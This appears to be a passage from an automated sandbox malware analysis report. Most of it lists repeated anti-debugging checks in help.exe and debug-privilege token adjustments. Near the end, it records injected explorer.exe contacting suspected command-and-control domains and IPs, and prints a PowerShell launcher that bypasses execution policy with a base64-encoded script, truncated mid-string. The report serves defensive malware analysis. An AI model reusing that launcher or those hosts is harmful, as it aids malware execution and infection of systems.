              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_031849A4 mov eax, dword ptr fs:[00000030h]21_2_031849A4
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030CB1E1 mov eax, dword ptr fs:[00000030h]21_2_030CB1E1
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030CB1E1 mov eax, dword ptr fs:[00000030h]21_2_030CB1E1
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030CB1E1 mov eax, dword ptr fs:[00000030h]21_2_030CB1E1
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_031541E8 mov eax, dword ptr fs:[00000030h]21_2_031541E8
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_03147016 mov eax, dword ptr fs:[00000030h]21_2_03147016
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_03147016 mov eax, dword ptr fs:[00000030h]21_2_03147016
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_03147016 mov eax, dword ptr fs:[00000030h]21_2_03147016
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_03194015 mov eax, dword ptr fs:[00000030h]21_2_03194015
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_03194015 mov eax, dword ptr fs:[00000030h]21_2_03194015
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030F002D mov eax, dword ptr fs:[00000030h]21_2_030F002D
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030F002D mov eax, dword ptr fs:[00000030h]21_2_030F002D
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030F002D mov eax, dword ptr fs:[00000030h]21_2_030F002D
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030F002D mov eax, dword ptr fs:[00000030h]21_2_030F002D
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030F002D mov eax, dword ptr fs:[00000030h]21_2_030F002D
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030DB02A mov eax, dword ptr fs:[00000030h]21_2_030DB02A
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030DB02A mov eax, dword ptr fs:[00000030h]21_2_030DB02A
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030DB02A mov eax, dword ptr fs:[00000030h]21_2_030DB02A
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030DB02A mov eax, dword ptr fs:[00000030h]21_2_030DB02A
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030EA830 mov eax, dword ptr fs:[00000030h]21_2_030EA830
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030EA830 mov eax, dword ptr fs:[00000030h]21_2_030EA830
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030EA830 mov eax, dword ptr fs:[00000030h]21_2_030EA830
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030EA830 mov eax, dword ptr fs:[00000030h]21_2_030EA830
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030E0050 mov eax, dword ptr fs:[00000030h]21_2_030E0050
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030E0050 mov eax, dword ptr fs:[00000030h]21_2_030E0050
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_03182073 mov eax, dword ptr fs:[00000030h]21_2_03182073
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_03191074 mov eax, dword ptr fs:[00000030h]21_2_03191074
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030C9080 mov eax, dword ptr fs:[00000030h]21_2_030C9080
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_03143884 mov eax, dword ptr fs:[00000030h]21_2_03143884
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_03143884 mov eax, dword ptr fs:[00000030h]21_2_03143884
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030F20A0 mov eax, dword ptr fs:[00000030h]21_2_030F20A0
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030F20A0 mov eax, dword ptr fs:[00000030h]21_2_030F20A0
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030F20A0 mov eax, dword ptr fs:[00000030h]21_2_030F20A0
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030F20A0 mov eax, dword ptr fs:[00000030h]21_2_030F20A0
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030F20A0 mov eax, dword ptr fs:[00000030h]21_2_030F20A0
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030F20A0 mov eax, dword ptr fs:[00000030h]21_2_030F20A0
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030FF0BF mov ecx, dword ptr fs:[00000030h]21_2_030FF0BF
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030FF0BF mov eax, dword ptr fs:[00000030h]21_2_030FF0BF
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030FF0BF mov eax, dword ptr fs:[00000030h]21_2_030FF0BF
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_031090AF mov eax, dword ptr fs:[00000030h]21_2_031090AF
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_0315B8D0 mov eax, dword ptr fs:[00000030h]21_2_0315B8D0
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_0315B8D0 mov ecx, dword ptr fs:[00000030h]21_2_0315B8D0
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_0315B8D0 mov eax, dword ptr fs:[00000030h]21_2_0315B8D0
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_0315B8D0 mov eax, dword ptr fs:[00000030h]21_2_0315B8D0
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_0315B8D0 mov eax, dword ptr fs:[00000030h]21_2_0315B8D0
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_0315B8D0 mov eax, dword ptr fs:[00000030h]21_2_0315B8D0
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030C58EC mov eax, dword ptr fs:[00000030h]21_2_030C58EC
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030EB8E4 mov eax, dword ptr fs:[00000030h]21_2_030EB8E4
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030EB8E4 mov eax, dword ptr fs:[00000030h]21_2_030EB8E4
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030C40E1 mov eax, dword ptr fs:[00000030h]21_2_030C40E1
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030C40E1 mov eax, dword ptr fs:[00000030h]21_2_030C40E1
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030C40E1 mov eax, dword ptr fs:[00000030h]21_2_030C40E1
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030FA70E mov eax, dword ptr fs:[00000030h]21_2_030FA70E
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030FA70E mov eax, dword ptr fs:[00000030h]21_2_030FA70E
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_0315FF10 mov eax, dword ptr fs:[00000030h]21_2_0315FF10
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_0315FF10 mov eax, dword ptr fs:[00000030h]21_2_0315FF10
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_0319070D mov eax, dword ptr fs:[00000030h]21_2_0319070D
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_0319070D mov eax, dword ptr fs:[00000030h]21_2_0319070D
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030EF716 mov eax, dword ptr fs:[00000030h]21_2_030EF716
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030C4F2E mov eax, dword ptr fs:[00000030h]21_2_030C4F2E
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030C4F2E mov eax, dword ptr fs:[00000030h]21_2_030C4F2E
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030EB73D mov eax, dword ptr fs:[00000030h]21_2_030EB73D
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030EB73D mov eax, dword ptr fs:[00000030h]21_2_030EB73D
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030FE730 mov eax, dword ptr fs:[00000030h]21_2_030FE730
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030DEF40 mov eax, dword ptr fs:[00000030h]21_2_030DEF40
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030DFF60 mov eax, dword ptr fs:[00000030h]21_2_030DFF60
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_03198F6A mov eax, dword ptr fs:[00000030h]21_2_03198F6A
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_03147794 mov eax, dword ptr fs:[00000030h]21_2_03147794
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_03147794 mov eax, dword ptr fs:[00000030h]21_2_03147794
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_03147794 mov eax, dword ptr fs:[00000030h]21_2_03147794
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030D8794 mov eax, dword ptr fs:[00000030h]21_2_030D8794
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_031037F5 mov eax, dword ptr fs:[00000030h]21_2_031037F5
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030CC600 mov eax, dword ptr fs:[00000030h]21_2_030CC600
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030CC600 mov eax, dword ptr fs:[00000030h]21_2_030CC600
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030CC600 mov eax, dword ptr fs:[00000030h]21_2_030CC600
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030F8E00 mov eax, dword ptr fs:[00000030h]21_2_030F8E00
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_03181608 mov eax, dword ptr fs:[00000030h]21_2_03181608
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030FA61C mov eax, dword ptr fs:[00000030h]21_2_030FA61C
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030FA61C mov eax, dword ptr fs:[00000030h]21_2_030FA61C
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_0317FE3F mov eax, dword ptr fs:[00000030h]21_2_0317FE3F
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030CE620 mov eax, dword ptr fs:[00000030h]21_2_030CE620
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030D7E41 mov eax, dword ptr fs:[00000030h]21_2_030D7E41
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030D7E41 mov eax, dword ptr fs:[00000030h]21_2_030D7E41
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030D7E41 mov eax, dword ptr fs:[00000030h]21_2_030D7E41
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030D7E41 mov eax, dword ptr fs:[00000030h]21_2_030D7E41
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030D7E41 mov eax, dword ptr fs:[00000030h]21_2_030D7E41
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030D7E41 mov eax, dword ptr fs:[00000030h]21_2_030D7E41
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_0318AE44 mov eax, dword ptr fs:[00000030h]21_2_0318AE44
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_0318AE44 mov eax, dword ptr fs:[00000030h]21_2_0318AE44
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030D766D mov eax, dword ptr fs:[00000030h]21_2_030D766D
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030EAE73 mov eax, dword ptr fs:[00000030h]21_2_030EAE73
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030EAE73 mov eax, dword ptr fs:[00000030h]21_2_030EAE73
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030EAE73 mov eax, dword ptr fs:[00000030h]21_2_030EAE73
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030EAE73 mov eax, dword ptr fs:[00000030h]21_2_030EAE73
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030EAE73 mov eax, dword ptr fs:[00000030h]21_2_030EAE73
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_0315FE87 mov eax, dword ptr fs:[00000030h]21_2_0315FE87
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_031446A7 mov eax, dword ptr fs:[00000030h]21_2_031446A7
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_03190EA5 mov eax, dword ptr fs:[00000030h]21_2_03190EA5
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_03190EA5 mov eax, dword ptr fs:[00000030h]21_2_03190EA5
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_03190EA5 mov eax, dword ptr fs:[00000030h]21_2_03190EA5
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030F36CC mov eax, dword ptr fs:[00000030h]21_2_030F36CC
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_03198ED6 mov eax, dword ptr fs:[00000030h]21_2_03198ED6
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_0317FEC0 mov eax, dword ptr fs:[00000030h]21_2_0317FEC0
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_03108EC7 mov eax, dword ptr fs:[00000030h]21_2_03108EC7
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030F16E0 mov ecx, dword ptr fs:[00000030h]21_2_030F16E0
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030D76E2 mov eax, dword ptr fs:[00000030h]21_2_030D76E2
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_0318E539 mov eax, dword ptr fs:[00000030h]21_2_0318E539
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_0314A537 mov eax, dword ptr fs:[00000030h]21_2_0314A537
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_03198D34 mov eax, dword ptr fs:[00000030h]21_2_03198D34
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030F4D3B mov eax, dword ptr fs:[00000030h]21_2_030F4D3B
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030F4D3B mov eax, dword ptr fs:[00000030h]21_2_030F4D3B
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030F4D3B mov eax, dword ptr fs:[00000030h]21_2_030F4D3B
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030D3D34 mov eax, dword ptr fs:[00000030h]21_2_030D3D34
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030D3D34 mov eax, dword ptr fs:[00000030h]21_2_030D3D34
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030D3D34 mov eax, dword ptr fs:[00000030h]21_2_030D3D34
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030D3D34 mov eax, dword ptr fs:[00000030h]21_2_030D3D34
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030D3D34 mov eax, dword ptr fs:[00000030h]21_2_030D3D34
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030D3D34 mov eax, dword ptr fs:[00000030h]21_2_030D3D34
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030D3D34 mov eax, dword ptr fs:[00000030h]21_2_030D3D34
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030D3D34 mov eax, dword ptr fs:[00000030h]21_2_030D3D34
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030D3D34 mov eax, dword ptr fs:[00000030h]21_2_030D3D34
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030D3D34 mov eax, dword ptr fs:[00000030h]21_2_030D3D34
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030D3D34 mov eax, dword ptr fs:[00000030h]21_2_030D3D34
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030D3D34 mov eax, dword ptr fs:[00000030h]21_2_030D3D34
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030D3D34 mov eax, dword ptr fs:[00000030h]21_2_030D3D34
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030CAD30 mov eax, dword ptr fs:[00000030h]21_2_030CAD30
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_03103D43 mov eax, dword ptr fs:[00000030h]21_2_03103D43
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_03143540 mov eax, dword ptr fs:[00000030h]21_2_03143540
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_03173D40 mov eax, dword ptr fs:[00000030h]21_2_03173D40
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030E7D50 mov eax, dword ptr fs:[00000030h]21_2_030E7D50
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030EC577 mov eax, dword ptr fs:[00000030h]21_2_030EC577
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030EC577 mov eax, dword ptr fs:[00000030h]21_2_030EC577
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030C2D8A mov eax, dword ptr fs:[00000030h]21_2_030C2D8A
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030C2D8A mov eax, dword ptr fs:[00000030h]21_2_030C2D8A
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030C2D8A mov eax, dword ptr fs:[00000030h]21_2_030C2D8A
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030C2D8A mov eax, dword ptr fs:[00000030h]21_2_030C2D8A
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030C2D8A mov eax, dword ptr fs:[00000030h]21_2_030C2D8A
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030F2581 mov eax, dword ptr fs:[00000030h]21_2_030F2581
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030F2581 mov eax, dword ptr fs:[00000030h]21_2_030F2581
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030F2581 mov eax, dword ptr fs:[00000030h]21_2_030F2581
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030F2581 mov eax, dword ptr fs:[00000030h]21_2_030F2581
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030FFD9B mov eax, dword ptr fs:[00000030h]21_2_030FFD9B
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030FFD9B mov eax, dword ptr fs:[00000030h]21_2_030FFD9B
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030F35A1 mov eax, dword ptr fs:[00000030h]21_2_030F35A1
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_031905AC mov eax, dword ptr fs:[00000030h]21_2_031905AC
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_031905AC mov eax, dword ptr fs:[00000030h]21_2_031905AC
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030F1DB5 mov eax, dword ptr fs:[00000030h]21_2_030F1DB5
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030F1DB5 mov eax, dword ptr fs:[00000030h]21_2_030F1DB5
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030F1DB5 mov eax, dword ptr fs:[00000030h]21_2_030F1DB5
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_03146DC9 mov eax, dword ptr fs:[00000030h]21_2_03146DC9
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_03146DC9 mov eax, dword ptr fs:[00000030h]21_2_03146DC9
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_03146DC9 mov eax, dword ptr fs:[00000030h]21_2_03146DC9
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_03146DC9 mov ecx, dword ptr fs:[00000030h]21_2_03146DC9
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_03146DC9 mov eax, dword ptr fs:[00000030h]21_2_03146DC9
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_03146DC9 mov eax, dword ptr fs:[00000030h]21_2_03146DC9
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_03178DF1 mov eax, dword ptr fs:[00000030h]21_2_03178DF1
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030DD5E0 mov eax, dword ptr fs:[00000030h]21_2_030DD5E0
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030DD5E0 mov eax, dword ptr fs:[00000030h]21_2_030DD5E0
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_0318FDE2 mov eax, dword ptr fs:[00000030h]21_2_0318FDE2
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_0318FDE2 mov eax, dword ptr fs:[00000030h]21_2_0318FDE2
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_0318FDE2 mov eax, dword ptr fs:[00000030h]21_2_0318FDE2
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_0318FDE2 mov eax, dword ptr fs:[00000030h]21_2_0318FDE2
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_0319740D mov eax, dword ptr fs:[00000030h]21_2_0319740D
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_0319740D mov eax, dword ptr fs:[00000030h]21_2_0319740D
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_0319740D mov eax, dword ptr fs:[00000030h]21_2_0319740D
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_03181C06 mov eax, dword ptr fs:[00000030h]21_2_03181C06
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_03181C06 mov eax, dword ptr fs:[00000030h]21_2_03181C06
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_03181C06 mov eax, dword ptr fs:[00000030h]21_2_03181C06
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_03181C06 mov eax, dword ptr fs:[00000030h]21_2_03181C06
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_03181C06 mov eax, dword ptr fs:[00000030h]21_2_03181C06
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_03181C06 mov eax, dword ptr fs:[00000030h]21_2_03181C06
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_03181C06 mov eax, dword ptr fs:[00000030h]21_2_03181C06
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_03181C06 mov eax, dword ptr fs:[00000030h]21_2_03181C06
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_03181C06 mov eax, dword ptr fs:[00000030h]21_2_03181C06
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_03181C06 mov eax, dword ptr fs:[00000030h]21_2_03181C06
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_03181C06 mov eax, dword ptr fs:[00000030h]21_2_03181C06
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_03181C06 mov eax, dword ptr fs:[00000030h]21_2_03181C06
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_03181C06 mov eax, dword ptr fs:[00000030h]21_2_03181C06
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_03181C06 mov eax, dword ptr fs:[00000030h]21_2_03181C06
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_03146C0A mov eax, dword ptr fs:[00000030h]21_2_03146C0A
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_03146C0A mov eax, dword ptr fs:[00000030h]21_2_03146C0A
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_03146C0A mov eax, dword ptr fs:[00000030h]21_2_03146C0A
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_03146C0A mov eax, dword ptr fs:[00000030h]21_2_03146C0A
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030FBC2C mov eax, dword ptr fs:[00000030h]21_2_030FBC2C
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030FA44B mov eax, dword ptr fs:[00000030h]21_2_030FA44B
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_0315C450 mov eax, dword ptr fs:[00000030h]21_2_0315C450
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_0315C450 mov eax, dword ptr fs:[00000030h]21_2_0315C450
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030E746D mov eax, dword ptr fs:[00000030h]21_2_030E746D
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030FAC7B mov eax, dword ptr fs:[00000030h]21_2_030FAC7B
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030FAC7B mov eax, dword ptr fs:[00000030h]21_2_030FAC7B
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030FAC7B mov eax, dword ptr fs:[00000030h]21_2_030FAC7B
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030FAC7B mov eax, dword ptr fs:[00000030h]21_2_030FAC7B
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030FAC7B mov eax, dword ptr fs:[00000030h]21_2_030FAC7B
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030FAC7B mov eax, dword ptr fs:[00000030h]21_2_030FAC7B
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030FAC7B mov eax, dword ptr fs:[00000030h]21_2_030FAC7B
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030FAC7B mov eax, dword ptr fs:[00000030h]21_2_030FAC7B
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030FAC7B mov eax, dword ptr fs:[00000030h]21_2_030FAC7B
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030FAC7B mov eax, dword ptr fs:[00000030h]21_2_030FAC7B
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030FAC7B mov eax, dword ptr fs:[00000030h]21_2_030FAC7B
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030D849B mov eax, dword ptr fs:[00000030h]21_2_030D849B
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_03198CD6 mov eax, dword ptr fs:[00000030h]21_2_03198CD6
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_031814FB mov eax, dword ptr fs:[00000030h]21_2_031814FB
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_03146CF0 mov eax, dword ptr fs:[00000030h]21_2_03146CF0
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_03146CF0 mov eax, dword ptr fs:[00000030h]21_2_03146CF0
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_03146CF0 mov eax, dword ptr fs:[00000030h]21_2_03146CF0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\qMBRkI.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\SysWOW64\help.exeProcess token adjusted: DebugJump to behavior

              HIPS / PFW / Operating System Protection Evasion:

              barindex
              System process connects to network (likely due to code injection or exploit)Show sources
              Source: C:\Windows\explorer.exeDomain query: www.thesongwriterschool.com
              Source: C:\Windows\explorer.exeNetwork Connect: 162.241.216.113 80Jump to behavior
              Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
              Source: C:\Windows\explorer.exeDomain query: www.anastasiamatkovskia.com
              Bypasses PowerShell execution policyShow sources
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -w 1 /e RgB1AG4AYwB0AGkAbwBuACAAZABSAGgAVQBYAG0AWQBIAFkAbgBPAEkAWgB3AHYAWgBHAEYAbQBGAFYAQwBqAGwARgBOAGQAcAB6AGgAYgBJAGQATABqAGoAewAgAHAAYQByAGEAbQAoACQAaABvAHIAcABBAFIAZwAgACwAIAAkAE4AWgBtAEwAYwBBAHEASQBTAFgAZwAgACwAIAAkAHQAcgBXAFIAdgBLAEsAbABHAHEASgBDAG8AawBJAHcAVQBSAFoAWABlAGcAZwBMAGcAQQBRAEUAUgBDAGcAdgBwACAALAAgACQATgBxAFIAWgB1AHEASAB1AEYAVwBQAGsAWAByAHMAdQBuAEIAeABKAEoATgBMAEwAbAB1AHQARgBVAEUASgBPAE4AQQAgACwAIAAkAFMAZQB2AFgAagBRAGoAYQBKAHYAdwBkAFoATQBXAE8AZgB4AGYAZgBBACAALAAgACQARgBvAHoAdwBCAGEAQgBOAEEAWABYAFQAYQBRAHMAZABPAHQAWgBtAEIAUQBvAFIAVQB0AHgAKQANAAoAJABDAHcAbgBzAGwARgBhAGYAUQBNAEUAVgBQAEwAUABIAHIAVQBiAGkAdwBQAEoASgBpAEgAcQBNAEcAZgBPAE4ATABqAEQAIAA9ACAAJwB5AE4AawB3AEkARwBwAEIAWgAnADsADQAKACQAagBXAE0AQQBsAHEASABCAHQAbQBtAGUASgBkAFAATwBZAGsAIAA9ACAAJwByAEoAZgBIAEYASQBkAGsAZgBaAHAAYQBJAGoATgBYAFQAegBGAHUAWABHAEsAcQBSAFgAVQBFAEcAZwB1AGgARQBEAGgATABFAE8ARwBzAEgARwAnADsADQAKACQAYgBEAE0AZAB1AHYARgB2AE8AVABxAGEAbAB5AG8AcQBpAG4AWgBkAHkAZgBJAFYAIAA9ACAAJwBDAEMAVABFAHQATgAnADsADQAKACQAUgBlAGkAbQBFAHQAYQBJAEEAbABmAE8ATgBkAHcATQBQAFkAWABFAGgAYwBkAHcAdgBxAFkAcgB0AG0AcQBVAEcAIAA9ACAAJwBJAEcAUABDAG0AJwA7AA0AC